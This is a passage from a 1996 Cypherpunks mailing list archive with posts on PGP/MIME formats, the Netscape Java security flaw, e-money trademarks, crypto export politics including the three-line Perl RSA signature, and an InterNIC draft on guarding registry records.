>consequences for anonymous mail. Believe it or not, a lot of people
>care. For example, the car manufacturers do not wish to broadcast the
>email addresses of their employees over the net.
>   One technical workaround is to do it the MOSS way - first, sign the
>message, resulting in an intermediate S/MIME message, then encrypt
>that into a second S/MIME message. I'd recommend that implementors
>make provisions for such recursive formats; I think it's likely that
>we'll see a lot of these on the Net.

Recursive-capable formats are clearly the way to go; the difficult problem is
deciding how many layers of recursion to do while decoding (e.g. all the way
down,
or one layer at a time asking the user for each round), which is largely
a user-interface issue rather than a platform issue, though it also lets you
build limited-purpose tools instead of an all-singing, all-dancing camel
of a platform.

Unfortunately, the formats being considered give you too much known plaintext
to make triple-encryption a useful way around the 40-bit-key silliness.
*/MIME has MIME headers, PGP has the (expendable but present) ------BEGIN.
A new MIME header like
        X: parameters
where parameters are ignored would limit you to three bytes of known plaintext,
which is at least a start.

>The prevailing philosophy of the PGP people is that the PGP
>application itself should not decode MIME formats - that should be the
>job of a separate application. It seems to me that this is going
>against the tradition, though. In the past, if you got a PGP message,
>you just ran it through PGP. Now you won't be able to do that.

The prevailing philosophy is also that we need to build an API toolkit
so PGP components can be easily included into programs.  This means that
PGP will inherently no longer be able to decode all the PGP-based messages,
which may have different layers of other material wrapped around them.
PGP/MIME is probably one of the better excuses for doing so, as are
improved keyring-handling applications.


>   Earlier, I mentioned that two and a half protocols survived the
>day. The remaining one is MSP. It's actually not a bad protocol.

Where can we find the new specs for MSP?  

>   It was announced that there will be a free reference implementation
>of MSP, available to US citizens.
Will it be GAK-enabled?


#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Sun, 25 Feb 1996 07:34:36 +0800
To: cypherpunks@toad.com
Subject: "E-Money" is trademarked
Message-ID: <9602240556.AA26142@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain




FYI, I learned tonight that Electronic Funds Clearinghouse, Inc., holds  
the trademark "E-Money" which is licensed to E-Money, Inc. a Delaware 

Corporation.  See the Web page http://www.efunds.com

I guess I will have to rename my E-Money mini-FAQ.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 25 Feb 1996 07:36:52 +0800
To: cypherpunks@toad.com
Subject: Not So REM_ote
Message-ID: <199602240455.XAA06821@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by karlton@netscape.com (Phil Karlton) on 
Fri, 23 Feb  8:19 PM


>Marianne Mueller is a Sun employee, not a Netscape 
>employee. The  original quote did not make that clear.


Here's the full article. My snipping fed Alex's take, still, he 
got the right stink of Netscape's and Sun's deodorizing the 
loss of pucker, which might be sniffed of Phil Karlton's 
distancing from Marianne Mueller, eh, even though Jeff Truehaft 
is the true fart-waver.


----------


   Wall Street Journal, February 23, 1996, p. B3.


   Netscape Will Issue Fix for Flaw Found In Browser System


   Mountain View, Calif. - Netscape Communications Corp.
   confirmed that Princeton University researchers found a
   potential security flaw in Netscape's popular Internet
   browser technology, but said the flaw was minor and that
   the company will issue a software fix for it next week.

   Edward Felten, an assistant professor of computer science
   at Princeton, posted a report on the Internet earlier this
   week describing the flaw in Netscape's Navigator 2.0, a
   product that enables the use of programs created with Java,
   Sun Microsystems Inc.'s hot programming language for the
   Internet. Java can be used to create "applets," small
   applications such as spreadsheets, that can be downloaded
   from the Internet's World Wide Web.

   Both Netscape's Navigator and Sun's Java have defenses
   designed to prevent Java applets from connecting with any
   computers except the ones they are summoned to by users and
   the ones they came from. But the Princeton team found a way
   to defeat those defenses, meaning that applets could
   theoretically be manuevered into other computers on a
   network. Applets aren't viruses, but in theory, they could
   be used to peruse confidential documents or other
   information.

   In trading on the Nasdaq Stock Market, Netscape fell $1.875
   to $62, while Sun Microsystems jumped 7.8% to $51.875, up
   $3.75.

   Netscape product manager Jeff Treuhaft said exploiting the
   flaw would require extremely skilled hacking and many other
   unlikely advantages, such as intimate familiarity with the
   network being hacked.

   Marianne Mueller, a top Java security engineer, also said
   the chances of such hacking occurring are "remote," but
   said Sun also soon will issue a software fix that will plug
   the possible security leak.

   [End]









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 25 Feb 1996 15:03:03 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: REM_ote
In-Reply-To: <199602231751.MAA16891@pipe3.nyc.pipeline.com>
Message-ID: <312EC5E6.540E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> 
> > Marianne Mueller, Java security engineer, also said the chances of such
> > hacking occurring are "remote."
> 
> This is the sort of bullshit that gets companies in trouble.  Netscape has
> a good record of responding to and fixing security problems.  Why should
> they feel the need to do spin control?  This borders on lying.

  I won't comment on this other than to point out that Marianne is a "Java
security engineer" at Sun Microsystems, not at Netscape.  John's excerpt
didn't make that clear.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Feb 1996 15:30:45 +0800
To: cypherpunks@toad.com
Subject: Re: "E-Money" is trademarked
Message-ID: <ad53f294030210048df8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:54 AM 2/24/96, Jim Miller wrote:
>FYI, I learned tonight that Electronic Funds Clearinghouse, Inc., holds
>the trademark "E-Money" which is licensed to E-Money, Inc. a Delaware
>
>Corporation.  See the Web page http://www.efunds.com
>
>I guess I will have to rename my E-Money mini-FAQ.

I guess we're left with "D-marks" (D for digital...).

I can only hope that someone soon trademarks the stupid "e$" and thus
enjoins the rest of us from using it.

(On a serious note, yet another example that the American copyrighting and
patenting engine is overrevving.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 25 Feb 1996 14:58:06 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: REM_ote
In-Reply-To: <ad53b6f9010210048c41@[205.199.118.202]>
Message-ID: <312EC793.3CE9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim wrote:
> (A useful feature for Netscape might be a facility that checks
> periodically to see if a security patch is in order, and displays a
> warning if it is.)

  Yes, we have thought of adding such a facility, not just for security
patches, but for general release updates as well.  However some folks may
remember some discussion (I think it was mostly in other forums) about
the possibility that Netscape was "phoning home" to deliver to us information
about your browsing habits.  Of course we have never done this, but if we
were "phoning home" periodically to check for new releases it might raise
some suspicion among the more paranoid.

  I guess we could make it an option...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Sat, 24 Feb 1996 17:21:00 +0800
To: cypherpunks@toad.com
Subject: SET spec available
Message-ID: <2.2.32.19960224080913.00aff338@mail.software.net>
MIME-Version: 1.0
Content-Type: text/plain


The SET transaction spec is now available on www.visa.com (and presumably on
www.mastercard.com although I didn't check).

Highlights are:
        It cops out on the big one - how to identify card users in the first
        place to issue certificates.

        The MS/Visa 'credential' that looked like a certificate but wasn't has
        been replace by X.509

--
John Pettitt
email:         jpettitt@well.sf.ca.us (home)
               jpp@software.net       (work)    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 25 Feb 1996 04:33:28 +0800
To: cypherpunks@toad.com
Subject: Re: "Internet Security: Your Worst Nightmare"
Message-ID: <ad53f45504021004f74b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:56 AM 2/24/96, an44880@anon.penet.fi wrote:
>Those were the words beaming on the cover of this week's _Information
>Week_. The totally worthless article on internet security contained
>this little gem:
....
>Complete with a picture of Freeman standing in front of an American
>flag.

I haven't seen this article, but I wouldn't hold the cover photo of Freeman
draped in the flag against him....I seem to recall a few Cypherpunks
similarly draped in the flag in a magazine article!

The photos used for stories are even more a matter of artistic choice than
the editing of the text is. Magazines are competing for rack space with the
likes of the several hundred other magazines, and covers are getting more
and more garish and more freakish. (I've ranted about this on other
occasions, so I won't here.)

It's all about sensationalism. I take a jaundiced view of yellow journalism.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 25 Feb 1996 07:35:23 +0800
To: cypherpunks@toad.com
Subject: Re: REM_ote
Message-ID: <9602240604.AA21589@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim <cp@proust.suba.com> wrote:
>> Marianne Mueller, Java security engineer, also said the chances of such
>> hacking occurring are "remote."
>
>This is the sort of bullshit that gets companies in trouble.

Reminds me of this old saying:

When you put your head in the sand, do realize what part of your anatomy is
most visible to the rest of the world... :)

JFA
**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Sat, 24 Feb 1996 17:10:23 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "E-Money" is trademarked
In-Reply-To: <9602240556.AA26142@bilbo.suite.com>
Message-ID: <199602240747.CAA25938@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jim_Miller@suite.com writes:
> FYI, I learned tonight that Electronic Funds Clearinghouse, Inc., holds  
> the trademark "E-Money" which is licensed to E-Money, Inc. a Delaware 
> 
> Corporation.  See the Web page http://www.efunds.com
> 
> I guess I will have to rename my E-Money mini-FAQ.

First Virtual doesn't seem to be concerned....

gilling% whois -h rs.internic.net emoney.com
First Virtual Holdings Incorporated (EMONEY-DOM)
   11975 El Camino Real  Suite 300
   San Diego, California 92130
   USA

   Domain Name: EMONEY.COM

   Administrative Contact:
      Lowery, Carlyn  (CL419)  lowery@FV.COM
      1-800-306-8127
   Technical Contact, Zone Contact:
      Kail, Mike  (MK634)  mdkail@FV.COM
      1-619-793-3359

   Record last updated on 20-Feb-96.
			  ~~~~~~~~~
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sat, 24 Feb 1996 17:07:14 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Need SSL firewall
In-Reply-To: <199602202203.RAA08526@bb.hks.net>
Message-ID: <199602240750.CAA24763@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I recommend Darren Reed's IPfilter package, which comes with OpenBSD,
and installs easily on FreeBSD and NetBSD.  It also works with SunOS
and Solaris, and I think even more operating systems.  It is highly
configurable.  Blocking all incoming TCP connections except to a few
host/port pairs should be quite simple.

You can get it at ftp://coombs.anu.edu.au:/pub/net/firewall/ip-filter

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Sun, 25 Feb 1996 05:39:26 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: consent
Message-ID: <01I1LI3IGF4I9KMG5A@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

I'm not completely sure of the attribution here, as cypherpunks
appears to be sending batches of messages to me with grunged From
lines.

VN> .  How exactly is consent extractedH^H^H^H^H^H^ requested?

"Government is not reason, it is not eloquence, it is force; like
fire, a troublesome servant and a fearful master. Never for a moment
should it be left to irresponsible action." G. Washington.

Consent is extracted by force of arms.


VN> .  When exactly is consent identified?

I believe that the rulers of this country consider the lack of
politicians hanging from town squares to indicate implied consent.

VN> .  How exactly is government applied to the consentees?
VN>    (caning, jailing, fines, etc.)

And death.

VN> .  How exactly do consentors change methodologies when they
VN> suddenly realize that they, too, can be subject to their own device?

I'm not sure what you mean by this. If you are asking how the rulers
react when they find themselves subject to their own evil devices, I
would say that they generally attempt to change the rules. An example
of this is that it is almost impossible to sue a federal officials
because of the broad immunity to prosecution afforded by current
federal law.

VN> .  Why should non-consenting citizens live with governing methods
VN> which in fact conflict with the pursuit of those three human
VN> virtues:  life, liberty, happiness?

Fear of the goverment monopoly of force?

VN> Supposedly, government is devised for ruling the "unruly";  a matter
VN> for definition and (dis)agreement which can provide endless hours
VN> of amusement for authoritarians, especially in court.

And those courts can be used to further browbeat the citizens through
inconsistant rulings on vaguely written laws. I believe vague laws
are one of america's great evils because of the uncertainty they
bring.

VN> I hear tell that many who are no longer amused are now learning the
VN> many uses of encryption.  Thus the list. 

And arming themselves with more lethal munitions as well.

Interesting questions. I believe that there is a larger groundswell
of resentment here and elsewhere than governments believe.

Consider, when breaking federal law is this easy...

#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)

Then something is _truely_ wrong with the laws.

replies to amp@pobox.com please.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMS6lIodTfgZXlXydAQEgiAf/ZEqghXk424n4ybj/QXl6yZL21FWvjLJE
37IrvYslw6HLERd3t9k28LC4hUXvhm56c7of3YeUHKsrbTsZyydqrxLE4DaiRkCB
mTTkChzvB+LH8V2q5PxMOW/YZQqzcyTnufVQKKHYy68RajLjUErLU5MSl9ICPgMh
Kicx04xsueYGPcwD88m5v18uLJPf+LJTZhliqBehHI4Ta7BIi96VgF9lIXfx/GTS
FeSru0EMYSn9S82WfnnsZX4sYeVHhvsxWPdRyeFOQHtlJ9hlH6/ehv+94Rzrh2yo
s2AoUh/aUfVrZBboCiJCDF9E4gOX1PfsS/Dn9yKo/vW52/cbA1UPjQ==
=SjfE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 24 Feb 1996 13:00:29 +0800
To: cypherpunks@toad.com
Subject: Digital Watermark
Message-ID: <199602240347.EAA05595@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Financial Times, 22 Feb 96

Digital watermark protects copyright

Scientists at the NEC Research Institute in Princeton
believe they have developed "a fundamental enabling
technology" for protecting the copyright of images and
music on the Internet.

They have developed a secure method of producing a
digital watermark, an invisible code that identifies the
owner, which is permanently embedded in the multimedia
data.

Attempts to remove the watermark would be virtually
impossible without degrading the image quality. Moreover,
counterfeiting would be almost impossible, says NEC. the
Japanese electronics company.

The digital watermark is designed to be used in
conjunction with cryptography, which limits access to
encrypted data to legitimate users.

NEC Research Institute:
US, tel 609-520-1555
fax 609-951-2481.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an44880@anon.penet.fi
Date: Sun, 25 Feb 1996 07:36:21 +0800
To: cypherpunks@toad.com
Subject: "Internet Security: Your Worst Nightmare"
Message-ID: <9602240556.AA06696@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Those were the words beaming on the cover of this week's _Information
Week_. The totally worthless article on internet security contained
this little gem:

Federal Law enforcement agencies, alarmed by the growing threat of
Net-related security breaches and crimes, are stepping up their
investigations of online intrusions. "We're aware that this is a
serious problem for any industry using the Internet," says Jim
Freeman, special agent in charge of the FBI's San Francisco office.
"The ultimate solution will be through better technology such as
encryption, but we will investigate any crimes in which a computer is
used as an instrument of intrusion or fraud.


Complete with a picture of Freeman standing in front of an American
flag.
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 25 Feb 1996 00:56:02 +0800
To: jsw@netscape.com
Subject: Re: REM_ote
In-Reply-To: <312EC793.3CE9@netscape.com>
Message-ID: <199602241617.IAA28724@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> about your browsing habits.  Of course we have never done this, but if we
> were "phoning home" periodically to check for new releases it might raise
> some suspicion among the more paranoid.
> 
>   I guess we could make it an option...

	I don't think you need to "phone home". Just make it happen
whenever someone hits the Netscape web site. some monstrous percentage
of Netscape users haven't changed the default home page, and even
those who have do go to the Netscape page every now and then.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 25 Feb 1996 06:56:21 +0800
To: cypherpunks@toad.com
Subject: Re: TIS--Building in Big Brother for a Better Tommorrow
Message-ID: <m0tqMqf-00091UC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 AM 2/23/96 -0800, Bill Frantz wrote:
>At 11:16 PM 2/22/96 -0800, Timothy C. May wrote:
>>And we should all remember, again, that basic observation: even if "key
>>escrow" is needed to recover *stored* files, it sure ain't needed for
>>*communications*!!
>
>If a key is being generated for two way communications, then it should be
>generated via a protocol like Diffie-Hellman which leaves no recoverable
>knowlege of the key outside the participants, and discarded when the
>session is over of frequently, whichever occurs more often.  This procedure
>will reduce the incentive for rubber hose attacks to recover these keys.

I noted long ago that one disadvantage with having a single, standardized 
encryption chip (like Clipper, even with the key-escrow un-enabled) is that 
the NSA has plenty of money in its budget to build a fake chip that can be 
installed during a black-bag job.  True, if they could fake one chip they 
could fake 10, but it's harder to do and the demand for any single kind of 
chip might drop to one per year.   Unfortunately, a sufficiently-complex 
FPLD would probably sub for anything if it were in the right package...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 25 Feb 1996 07:36:36 +0800
To: cypherpunks@toad.com
Subject: Remember, RC4 is now PC1
Message-ID: <199602241823.KAA18950@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:46 PM 2/24/96 GMT, aba@atlas.ex.ac.uk wrote:
>I don't see any stigma attached with IPG admitting they have a PRNG
>seeded with a key, and XORing the PRNG stream with the data - this is
>exactly what RC4 does.

>From now, instead of saying "RC4" let us say 
"PC1, (formerly known as RC4)"

That will teach them to trademark names.  We will forget their names.

The net views intellectual property rights as damage and routes 
around them.

Every time you say RC4 without saying "Trademark of some bunch of 
lawyer scum" you theoretically break the lawyer made law.  So let us 
stop doing it.   Serve them right.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 24 Feb 1996 23:47:08 +0800
To: cypherpunks@toad.com
Subject: The "excrable" e$
Message-ID: <v02120d03ad54d682c80f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 AM 2/24/96, Timothy C. May wrote:
>I can only hope that someone soon trademarks the stupid "e$" and thus
>enjoins the rest of us from using it.

Or, as Mr. May has said in the past, "the excrable" e$.

;-).

>(On a serious note, yet another example that the American copyrighting and
>patenting engine is overrevving.)

Say "amen", somebody.


Actually, *I* seem to be the unfortunate wretch who coined (ahem...) the
term "e$", as it refers to a dollar digitally spent on the internet. My
apologies to those spenders of yen, marks, and pounds. I hope I can take
some solice in the notion that all money's fungible. :-). In addition,
there's no reason not to use e¥, or e£, if people can read your character
maps. One of the reasons I chose e$ is that I believe $ is way down deep in
the ASCII character set, and thus most machines will display it.

Ethnocentrism and potential trademark enfringements aside, a bit of
pronounciation may be useful here: when I see "e$" alone in text, I say
"e-money" (again, my apologies), and when I see "e$10.00", I say "ten
e-dollars".

Speaking of trademarks, I had hoped that by using "e$" everywhere that we
could avoid such legal mechanations, in the same vein that various
mathematical notation schemes cannot be copyrighted (I think). For the
lawyers out there, is it possible to do the equivalent of a GNU GPL
"copy-left" with a potential trademark like "e$"?  If it is, I'd like to do
that. Ubiquity is power, and all that, "excrable" symbols and all...

<PlugMode-on>

Anyone interested in discussing trends in, or the consequences (economic,
social or otherwise) of *financial* cryptography on public networks, is
cordially invited to subscribe to the e$ mail list. Send "subscribe e$" in
the body of a message to majordomo@thumper.vmeng.com, and, after you've
subscribed, introduce yourself! The list is unmoderated.

<PlugMode-off>

Cheers,
Bob Hettinga
(e$mpressario)


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Sun, 25 Feb 1996 02:32:26 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: The "excrable" e$
In-Reply-To: <v02120d03ad54d682c80f@[199.0.65.105]>
Message-ID: <199602241757.LAA02466@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 24 Feb 1996 10:25:37 -0500, rah@shipwright.com (Robert Hettinga) said:

RH> Speaking of trademarks, I had hoped that by using "e$" everywhere
RH> that we could avoid such legal mechanations, in the same vein that
RH> various mathematical notation schemes cannot be copyrighted (I
RH> think). For the lawyers out there, is it possible to do the
RH> equivalent of a GNU GPL "copy-left" with a potential trademark
RH> like "e$"?  If it is, I'd like to do that. Ubiquity is power, and
RH> all that, "excrable" symbols and all...

	Well, since a copyleft is just a copyright (legally) under a
different name, I don't see any reason that you couldn't 'sharemark'
"e$" under the trademark conditions.  Only 'problem' is that if you
don't defend a trademark, it can become public domain, but then,
that's what we want, right?

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sethf@MIT.EDU
Date: Sun, 25 Feb 1996 02:34:12 +0800
To: dsmith@midwest.net
Subject: Re: Internet shutdown Feb 29?
Message-ID: <9602241807.AA24746@frumious-bandersnatch.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> This looks completely, totally, and insanely bogus, but I

	Yes. It would have made a good April Fool's joke. No reality to
it whatsoever.

> Anybody from MIT ever heard of "Kim Dereksen"?

	No such person listed as being employed at MIT. You can check
how to use the MIT on-line directory by    finger help@mit.edu 

	There's also no "Interconnected Network Maintenance staff" at
MIT, that I know about.

>  your users will be able to read it.  Please pass this message on to other
>  sysops and Internet users as well.  Thank you.

	This makes it a chain letter. NO!

================
Seth Finkelstein
sethf@mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Eden <erice@internic.net>
Date: Sun, 25 Feb 1996 01:32:02 +0800
To: cypherpunks@toad.com
Subject: InterNIC Guardian Object Draft
Message-ID: <199602241712.MAA26212@ops.internic.net>
MIME-Version: 1.0
Content-Type: text/plain


 
We're distributing this to the Internet community for comments
and suggestions.  If you have any ideas for improving this draft
please let us know.

I apologize in advance for the length, but the authors are really  
interested in your thoughts.                

Thanks,



Eric Eden                                           erice@internic.net
InterNIC Registration Services                            703-736-0145


 [ URL ftp://rs.internic.net/policy/internic/internic-gen-1.txt ]  [ 2/96 ]
 
                                                               Jasdip Singh
                                                          Network Solutions
                                                               Mark Kosters
                                                          Network Solutions
 
 
                         The InterNIC Guardian Object
                                    DRAFT
 
 
 Table of Contents
 
 1. Introduction.......................................................   1
 2. Main Features of a Guardian........................................   1
 3. Guardian Attributes................................................   1
 4. Registering the Guardian Attributes................................   4
 4.1 Using the New Contact Template....................................   5
 4.2 Using the Modified Registration Templates.........................   5
 5. Linking Guardian Information to Existing Records...................   5
 6. Notification.......................................................   6
 7. Object Update Rules................................................   6
 7.1 Request from a Contact with Authentication Information............   7
 7.2 Request from a Contact without Authentication Information.........   7
 7.3 Request from a Sender not listed as a Contact.....................   7
 8. Object Use Rules...................................................   8
 8.1 Request from a Contact............................................   8
 8.2 Request from a Sender not listed as a Contact.....................   8
 9. Other Guardian Issues..............................................   8
 9.1 Number of Guardians per Object....................................   8
 9.2 Protecting Guardian Information...................................   9
 9.3 Displaying Guardian Information...................................   9
 10. Conclusion........................................................   9
 11. References........................................................   9
 12. Acknowledgements..................................................   9
 
 A. The Proposed Contact Template......................................  10
 B. The Proposed Link Template.........................................  12
 C. The Proposed Notify Template.......................................  14
 D. Object Update Rules................................................  15
 E. Object Use Rules...................................................  16
 F. Examples...........................................................  17
 F.1 How to Register a New Contact with Authentication Information.....  17
 F.2 How to Link Guardian Information to Existing Records..............  18
 F.3 How to Update a Guarded Record....................................  19
 F.4 WHOIS Display of Guardian Information.............................  20
 
 
 
 
 
 
 
                                                                   [Page i]
 
 1. Introduction
 
    This document proposes a model to authorize changes made to the Objects
    (Domains, Networks, Autonomous System Numbers, and Hosts) registered
    with the InterNIC.  The registration activity at the InterNIC has
    increased exponentially with the rapid growth of the Internet.  In the
    absence of a formal authorization model, the likelihood of making
    malicious changes to the registered Objects has also increased and
    could have serious consequences at the affected sites.  For example, an
    unauthorized update could lead a commercial organization to lose its
    presence on the Internet until that update is reversed.
 
 
 2. Main Features of a Guardian
 
    -  A Guardian is an Object that protects other Objects from unauthorized
       changes.  It is basically a Contact with Authentication Information.
 
    -  The different authorization schemes to authenticate a Guardian are
       MAIL-FROM, CRYPT-PW, and PGP.
 
    -  The use of a Guardian is optional.
 
    -  An Object may be guarded by multiple Guardians with each Guardian
       having an equal authority to make changes to the Object.
 
 
 3. Guardian Attributes
 
    Currently, the InterNIC allows a registered Object to be updated if
    the request came from one of its Contacts.  This model is weak due to
    potential mail spoofing.  To allow for stronger authorization schemes,
    the proposed authorization model defines a new Object called Guardian.
 
    A Guardian is basically a Contact with Authentication Information.
    It inherits the attributes of a Contact Object and has the additional
    authentication attributes.  The definition of a Guardian is derived
    from a Contact because a particular Contact (Administrative, Technical,
    or Billing) represents some form of holding of a registered Object and
    the holder of an Object is most likely to guard it also.
 
 
 
 
 
 
                                                                   [Page 1]
 
    The attributes of a Guardian are:
 
    Name               Required
    Type               Required
    Address            Required
    Phone              Required
    Fax                Optional
    Email              Required
    Notify Update      Optional
    Notify Use         Optional
    Auth Scheme        Required *
    Auth Info          Required *
    Public             Optional
 
    * The Auth Scheme and Auth Info attributes are required only for a
      Guardian Object (a Contact with Authentication Information) and not
      for a Contact Object (a Contact without Authentication Information).
 
    Name, Type, Address, Phone, Fax, Email, Notify Update, and Notify Use
    are the attributes a Guardian inherits from a Contact Object.  Auth
    Scheme, Auth Info, and Public are the additional authentication
    attributes of a Guardian.
 
    Name
 
       Name of a Guardian.
 
    Type
 
       Type of a Guardian.  It can have values I (Individual) or R (Role
       Account).
 
    Address
 
       Postal address of a Guardian.
 
    Phone
 
       Phone number of a Guardian.
 
    Fax
 
       Fax number of a Guardian.
 
    Email
 
       Email address of a Guardian.
 
 
 
 
                                                                   [Page 2]
 
    Notify Update
 
       This attribute determines if and when a Guardian should be notified
       about the update of an Object the Guardian is responsible for.  It
       can have values BEFORE-UPDATE, AFTER-UPDATE, and NOT-CARE.
 
       BEFORE-UPDATE   The Guardian will be notified before updating the
                       Object.
 
       AFTER-UPDATE    The Guardian will be notified after updating the
                       Object.  AFTER-UPDATE is the default value.
 
       NOT-CARE        The Guardian will not be notified about the Object
                       update because it does not want to be notified.
 
       Currently, a Guardian's Notify Update attribute will be the same
       for all the Objects the Guardian is responsible for.  In future,
       it will be defined on a per Object basis for each of the Objects
       a Guardian is guarding.  
 
    Notify Use
 
       This attribute determines if and when a Guardian should be notified
       about the use of an Object the Guardian is responsible for.  For
       example, a Guardian of a Host may be notified when someone else
       lists it as a DNS server for a Domain.  It can have values
